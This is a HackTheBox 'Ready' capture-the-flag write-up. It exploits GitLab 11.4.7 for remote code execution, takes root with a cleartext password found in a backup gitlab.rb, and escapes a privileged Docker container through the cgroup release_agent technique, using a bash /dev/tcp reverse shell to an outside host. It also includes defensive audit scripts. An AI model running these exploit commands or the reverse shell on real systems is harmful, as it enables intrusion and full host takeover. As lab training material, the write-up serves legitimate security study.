HackTheBox - Ready write up

Ready is a Medium Linux box.

Recon

As always, let's start with an nmap scan.

$ nmap -A -p- -oN scan.nmap 10.10.10.220

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As you can see, there are two open ports: 22 for SSH and 5080 for GitLab (served by nginx).

Web

http://10.10.10.220:5080/users/sign_in

I register a user to find the version of Gitlab.

Gitlab CE v11.4.7

User

This version is vulnerable to RCE (remote code execution); I use this exploit from GitHub.

$ python3 gitlab_rce.py http://10.10.10.220:5080 10.10.14.130
Gitlab Exploit by dotPY [insert fancy ascii art]
registering z5WS1NhskU:Gf7QvhGTUl - 200
Getting version of http://10.10.10.220:5080 - 200
The Version seems to be 11.4.7! Choose wisely
delete user z5WS1NhskU - 200
[0] - GitlabRCE1147 - RCE for Version <=11.4.7
[1] - GitlabRCE1281LFIUser - LFI for version 10.4-12.8.1 and maybe more
[2] - GitlabRCE1281RCE - RCE for version 12.4.0-12.8.1 - !!RUBY REVERSE SHELL IS VERY UNRELIABLE!! WIP
type a number and hit enter to choose exploit: 0
Start a listener on port 42069 and hit enter (nc -vlnp 42069)
registering TxA6x9UnTK:mHVy6vTFkK - 200
hacking in progress - 200
delete user TxA6x9UnTK - 200
$ nc -lvnp 42069
Connection from 10.10.10.220:37878
bash: cannot set terminal process group (507): Inappropriate ioctl for device
bash: no job control in this shell
git@gitlab:~/gitlab-rails/working$ id
uid=998(git) gid=998(git) groups=998(git)

We have a shell and the user.txt flag!

git@gitlab:/home/dude$ cat user.txt
e1e30b052b6ec06706...

Root

We are now inside a Docker container.

$ ls -al /
total 108
drwxr-xr-x   1 root root 4096 Dec 24 18:30 .
drwxr-xr-x   1 root root 4096 Dec 24 18:30 ..
-rwxr-xr-x   1 root root    0 Dec  1 12:41 .dockerenv
...
git@gitlab:/tmp$ systemd-detect-virt
docker

After some enumeration, we find passwords stored in cleartext.

$ find / -name backup 2>/dev/null
...
/opt/backup

$ ls -al /opt/backup
total 112
drwxr-xr-x 2 root root  4096 Dec  7 09:25 .
drwxr-xr-x 1 root root  4096 Dec  1 16:23 ..
-rw-r--r-- 1 root root   872 Dec  7 09:25 docker-compose.yml
-rw-r--r-- 1 root root 15092 Dec  1 16:23 gitlab-secrets.json
-rw-r--r-- 1 root root 79639 Dec  1 19:20 gitlab.rb

git@gitlab:/opt/backup$ grep password gitlab.rb
...
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
...
git@gitlab:/tmp$ python3 -c "import pty;pty.spawn('/bin/bash')"
git@gitlab:/tmp$ su root
Password: wW59U!ZKMbG9+*#h

root@gitlab:/tmp# 
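The grep above is the manual form of a check worth automating on any host that keeps backup copies of service configuration. As an added example of mine (not part of the original write-up), the script below scans gitlab.rb-style Ruby assignments for credential-bearing keys that hold a real value, skipping the commented-out defaults that a plain grep also matches, and reports whether the file mode leaves it readable to every local user, as the -rw-r--r-- root-owned /opt/backup/gitlab.rb is here. The sample file content and every password value in it are constructed placeholders, and the function and key names are my own.

```python
import os
import re
import stat
import tempfile

# Ruby-style assignment as used in gitlab.rb, e.g.
#   gitlab_rails['smtp_password'] = "value"
ASSIGN_RE = re.compile(
    r"""^\s*[\w.]+\[['"](?P<key>\w+)['"]\]\s*=\s*['"](?P<value>[^'"]*)['"]"""
)
# Key names that normally carry a credential.
SECRET_KEY_RE = re.compile(r"(password|secret|token|private_key)", re.I)


def find_cleartext_secrets(text):
    """Return (line_number, key) for every uncommented assignment of a
    secret-looking key to a non-empty quoted literal."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # commented-out defaults are not live secrets
        m = ASSIGN_RE.match(line)
        if m and SECRET_KEY_RE.search(m.group("key")) and m.group("value"):
            hits.append((lineno, m.group("key")))
    return hits


def world_readable(mode):
    """True if the file mode grants read to 'other' (e.g. -rw-r--r--)."""
    return bool(mode & stat.S_IROTH)


def audit_config_file(path):
    """Combine both checks for one file on disk."""
    with open(path) as fh:
        secrets = find_cleartext_secrets(fh.read())
    return {
        "secrets": secrets,
        "world_readable": world_readable(os.stat(path).st_mode),
    }


# Constructed sample mimicking the layout of a GitLab omnibus gitlab.rb;
# the values are placeholders, not real credentials.
SAMPLE_GITLAB_RB = """\
# gitlab_rails['smtp_password'] = "smtp user password"
gitlab_rails['smtp_enable'] = true
gitlab_rails['smtp_user_name'] = "gitlab"
gitlab_rails['smtp_password'] = "EXAMPLE-NOT-A-REAL-PASSWORD"
gitlab_rails['db_password'] = ""
gitlab_rails['initial_root_password'] = 'EXAMPLE-ROOT-PASSWORD'
"""


def demo():
    """Write the sample with the permissive mode seen in /opt/backup and audit it."""
    with tempfile.NamedTemporaryFile("w", suffix=".rb", delete=False) as tmp:
        tmp.write(SAMPLE_GITLAB_RB)
        path = tmp.name
    os.chmod(path, 0o644)
    try:
        return audit_config_file(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

Run it against a real backup directory by calling audit_config_file on each file; a non-empty "secrets" list together with "world_readable": True is exactly the condition that handed over the root password on this box.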

We are now root, but root inside the Docker container, not on the real host. We need to escape the container.

root@gitlab:/opt/backup$ cat docker-compose.yml
version: '2.4'

services:
  web:
    image: 'gitlab/gitlab-ce:11.4.7-ce.0'
    restart: always
    hostname: 'gitlab.example.com'
...
    privileged: true
...

As you can see, the GitLab container is running in privileged mode, which means all Linux capabilities are granted to it. Thanks to that we can escape the container and run commands on the host.
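Privileged mode is visible from inside the container: the kernel exposes each process's effective capability set as the CapEff bitmask in /proc/<pid>/status. As an added example of mine (not the author's), the script below decodes that bitmask into capability names and flags the ones, CAP_SYS_ADMIN first among them, that a container audit should never find in a workload that does not need them; mounting a cgroup filesystem requires CAP_SYS_ADMIN, and Docker's default capability set does not include it. The two status excerpts are constructed: Docker's default set (00000000a80425fb) and the full set a privileged container receives on a kernel with 38 capabilities (0000003fffffffff). The DANGEROUS list is my selection.

```python
import re

# Linux capability bit numbers, in order, from include/uapi/linux/capability.h
CAP_NAMES = [
    "CHOWN", "DAC_OVERRIDE", "DAC_READ_SEARCH", "FOWNER", "FSETID", "KILL",
    "SETGID", "SETUID", "SETPCAP", "LINUX_IMMUTABLE", "NET_BIND_SERVICE",
    "NET_BROADCAST", "NET_ADMIN", "NET_RAW", "IPC_LOCK", "IPC_OWNER",
    "SYS_MODULE", "SYS_RAWIO", "SYS_CHROOT", "SYS_PTRACE", "SYS_PACCT",
    "SYS_ADMIN", "SYS_BOOT", "SYS_NICE", "SYS_RESOURCE", "SYS_TIME",
    "SYS_TTY_CONFIG", "MKNOD", "LEASE", "AUDIT_WRITE", "AUDIT_CONTROL",
    "SETFCAP", "MAC_OVERRIDE", "MAC_ADMIN", "SYSLOG", "WAKE_ALARM",
    "BLOCK_SUSPEND", "AUDIT_READ", "PERFMON", "BPF", "CHECKPOINT_RESTORE",
]

# Capabilities that let a root process inside a container reach host
# resources (mounts, kernel modules, raw devices, other processes' memory).
# This selection is mine; tune it to the workload being audited.
DANGEROUS = {"SYS_ADMIN", "SYS_MODULE", "SYS_RAWIO", "SYS_PTRACE", "DAC_READ_SEARCH"}


def decode_caps(mask):
    """Turn a CapEff/CapPrm bitmask into the set of capability names it holds."""
    return {CAP_NAMES[i] for i in range(len(CAP_NAMES)) if mask >> i & 1}


def effective_caps(status_text):
    """Parse the CapEff line of a /proc/<pid>/status document."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.M)
    if not m:
        raise ValueError("no CapEff line in status text")
    return decode_caps(int(m.group(1), 16))


def audit(status_text):
    """Return the dangerous capabilities held, sorted; an empty list means
    the process is confined to a non-privileged set."""
    return sorted(effective_caps(status_text) & DANGEROUS)


def audit_self():
    """Audit the running process itself (Linux only)."""
    with open("/proc/self/status") as fh:
        return audit(fh.read())


# Constructed excerpts of /proc/self/status for the two cases discussed.
DEFAULT_STATUS = (
    "Name:\tbash\n"
    "CapInh:\t0000000000000000\n"
    "CapPrm:\t00000000a80425fb\n"
    "CapEff:\t00000000a80425fb\n"
)
PRIVILEGED_STATUS = (
    "Name:\tbash\n"
    "CapInh:\t0000000000000000\n"
    "CapPrm:\t0000003fffffffff\n"
    "CapEff:\t0000003fffffffff\n"
)

if __name__ == "__main__":
    for label, text in (("default", DEFAULT_STATUS), ("privileged", PRIVILEGED_STATUS)):
        print(label, audit(text) or "ok")
```

Dropping privileged: true from the compose file, or restricting the service with cap_drop, is what makes audit_self() come back empty for a container like this one; the same decoding applies to the CapBnd line if you want to see the bounding set instead.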

Thanks to this article, I found two ways to escape a container running in privileged mode.

root@gitlab:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x   
root@gitlab:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@gitlab:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
root@gitlab:/# echo '#!/bin/bash' > /cmd
root@gitlab:/# echo "bash -i >& /dev/tcp/10.10.14.91/4444 0>&1" >> /cmd
root@gitlab:/# cat /cmd
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.91/4444 0>&1
root@gitlab:/# chmod a+x /cmd
root@gitlab:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
$ nc -lvnp 4444
Connection from 10.10.10.220:58518
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@ready:/# id
uid=0(root) gid=0(root) groups=0(root)
root@ready:/# cat /root/root.txt
b7f98681505cd39066f67...

Rooted!
